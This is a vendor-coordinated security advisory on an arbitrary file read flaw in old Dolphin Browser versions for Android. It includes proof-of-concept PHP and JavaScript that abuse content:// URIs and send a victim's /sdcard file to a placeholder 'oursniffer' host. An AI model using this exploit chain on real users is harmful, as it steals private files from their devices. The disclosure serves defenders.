PT-2012-60: Arbitrary File Reading in Dolphin Browser

Vulnerable software

Dolphin Browser
Version: 9.0.3 and earlier

Application link:
http://dolphin-browser.com/

Severity level

Severity level: Medium
Impact: Arbitrary File Reading
Access Vector: Remote

CVSS v2:
Base Score: 5.8
Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:P)

CVE: not assigned

Software description

Dolphin Browser is a powerful, quick and elegant browser for Android 2.0+

Vulnerability description

The specialists of the Positive Research center have detected Remote Arbitrary File Reading vulnerability in Dolphin Browser.

The vulnerability exists because of incorrect content:// wrapper processing that allows you to remotely address the available content provider. Therefore the attacker can view  /sdcard/1.txt file contents if the victim follows content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/1.txt link.
The attack is simply implemented.
1. A victim follows a link to the web site with the following PHP code:

<? echo "<body onload=\"setTimeout('window.location=\'1day.php\'',1000);setTimeout('window.location=\'content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/download/test.html\'',5000);\">"; ?>

2. Browser automatically loads 1day.php page with the following code:

<?
header('Content-Disposition: attachment; filename="test.html"');
?>
<iframe src="content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/1.txt"></iframe>
<script>
window.onload = function () { file = document.getElementsByTagName('iframe')[0].contentWindow.document.body.innerHTML;
img = new Image(); img.src = 'http://oursniffer/sniff.php?data='+file;
}
</script>

3. Then the user presses "Save" button, and the exploit now is located here: /sdcard/download/test.html
4. Then we forward the user to this file (content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/download/test.html) via a link and the code is executed.
7. Data from /sdcard/1.txt file is written into the sniffer's log.

How to fix

Update your software up to the latest version.

Advisory status

18.12.2012 - Vendor is notified
18.12.2012 - Vendor gets vulnerability details
05.02.2013 - Vendor releases fixed version and details
07.03.2013 - Public disclosure

Credits

The vulnerabilities has discovered by Mikhail Firstov, Positive Research Center (Positive Technologies Company)

References

http://en.securitylab.ru/lab/PT-2012-60

Reports on the vulnerabilities previously discovered by Positive Research:

http://ptsecurity.com/research/advisory/
http://en.securitylab.ru/lab/

Threatscape